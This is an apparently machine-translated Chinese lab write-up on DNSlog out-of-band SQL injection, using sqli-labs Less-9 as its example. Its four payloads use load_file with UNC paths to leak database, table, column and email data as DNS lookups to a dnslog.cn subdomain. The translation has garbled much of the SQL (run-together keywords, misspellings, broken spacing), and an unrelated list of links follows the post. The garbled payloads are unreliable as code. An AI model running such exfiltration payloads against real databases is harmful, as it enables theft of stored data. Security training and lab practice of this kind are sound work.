DNSlog注入测试

技术DNSlog注入测试 DNSlog注入测试之前提到的时间盲注,虽然用途比较广泛,但其查询耗时较长;且盲注都需要发送大量请求,容易被WAF拦截。
此时,我们就要用到DNSlog注入——一个可以以较少的

DNSlog注射试验。

前面提到的时间盲注虽然应用广泛,但其查询耗时较长;而且盲注需要发送大量请求,容易被WAF拦截。

此时,我们将使用DNSlog injection ——,这是一种可以用更少的访问快速获取信息的注入方法。

(但是,它对服务器有一些额外的要求;这里的DNSlog注入只有在相关权限打开且服务器系统为windows时才能执行。)

(BUUOJ,那个sql-lab是不行的。)

请勿在校园网上进行此测试!

准备工作:

1.DNS:一个可用的本地DNS服务器。

这里用的是http://www.dnslog.cn/。

获取子域后,验证您可以使用:

输入网址:http://test.z2v67d.dnslog.cn/,

证明DNS服务器工作正常。

二、SQL:检查权限字段。

如果是这样,那也行;如果没有,转到相关的ini文件并删除第三个值。

三.复制:

以SQL-Labless-9为例。我们过去常常盲目地用时间来注释这个话题。

payloads:

id=-1 ' andif((selectload _ file(concat(' \ \ ',(selectdatabase())limit 0,1), z2v67d.dnslog.cn\\abc ')),1,0) -

id=-1 ' andif((selectload _ file(concat(' \ \ '),(selecthex(group _ concat(table _ name))from information _ schema . table where table _ schema=database()), z2v67d.dnslog.cn\\abc ')),1,0) -

id=-1 ' andif((selectload _ file(concat(' \ \ '),(selecthex(group _ concat(column _ name))from information _ schema . columns hweretable _ schema=database())和table_name='emails '), z2v67d.dnslog.cn\\abc ')),1,0) -

id=-1 ' andif((selectload _ file(concat(' \ \ '),(selecthex((email _ id))from email slimit1,1), z2v67d.dnslog.cn\\abc ')),1,0) -

DNS服务器记录:

解码:

第四,心路历程。

意识到之前对DNS一无所知,所以花了很长时间看原理(现在还是有点晕)。

在实现的过程中,有两个主要障碍:

(1)加载文件

你需要给它添加一个绝对路径。例如:选择load _ file(' d :/wamp 64/www/sqli-labs-php7-master/Less-1/result . txt ');

测试时,需要使用UNC网络路径。

格式:\\servername\sharename,其中servername是服务器名称。Sharename是共享资源的名称。

目录或文件的UNC名称可以包括共享名称下的目录路径,格式为:\ \ servername \ sharename \ directory \ filename。

eg : select load _ file(' \ \ \ \ load file test . z2v 67d . dnslog . cn \ \ ABC ');

双反斜杠用于处理转义。

(2)检查数据库的内容。

(如果查询成功,页面将有几秒钟的刷新延迟;可以用来快速判断查询的成败(是否类似于时间盲)。

内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/62066.html

(0)

相关推荐

  • Python使用消息框的语法显示相关消息方法是什么

    技术Python使用消息框的语法显示相关消息方法是什么这篇文章主要介绍“Python使用消息框的语法显示相关消息方法是什么”,在日常操作中,相信很多人在Python使用消息框的语法显示相关消息方法是什么问题上存在疑惑,小

    攻略 2021年11月25日
  • 抖音刷评论,抖音刷评论会被限流吗?

    技术抖音刷评论,抖音刷评论会被限流吗?抖音运营目前已经进入了新的发展阶段,抖音用户逐渐多了起来,同时抖音上的管理也越来越严格,小伙伴在刷粉的时候会是担心自己的账号会不会被限流,今天我们就来了解以下抖音刷赞,抖音刷评论。

    测评 2021年11月10日
  • 如何探讨Java代理模式与反射机制的实际应用

    技术如何探讨Java代理模式与反射机制的实际应用如何探讨Java代理模式与反射机制的实际应用,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。Java提供了一套

    攻略 2021年11月21日
  • 洋葱炒蛋家常做法,洋葱炒鸡蛋.怎么做才好吃

    技术洋葱炒蛋家常做法,洋葱炒鸡蛋.怎么做才好吃主料洋葱200克鸡蛋100克辅料油适量盐适量酱油适量鸡精适量料酒适量步骤洋葱炒鸡蛋的做法步骤11.准备好所有食材洋葱炒蛋家常做法。洋葱炒鸡蛋的做法步骤22.把洋葱洗净,切成细

    生活 2021年10月20日
  • hadoop学习笔记之-hbase完全分布模式安装-5

    技术hadoop学习笔记之-hbase完全分布模式安装-5 hadoop学习笔记之-hbase完全分布模式安装-5http://blog.csdn.net/lichangzai/article/deta

    礼包 2021年12月22日
  • 皆为利来,熙熙攘攘皆为利往下句是什么

    技术皆为利来,熙熙攘攘皆为利往下句是什么天下熙熙皆为利来,天下攘攘皆为利往皆为利来。出自:司马迁·西汉《史记 货殖列传》
    译文:天下人为了利益而蜂拥而至,为了利益各奔东西。
    《史记》是西汉著名史学家司马迁撰写的一部纪传体

    生活 2021年10月28日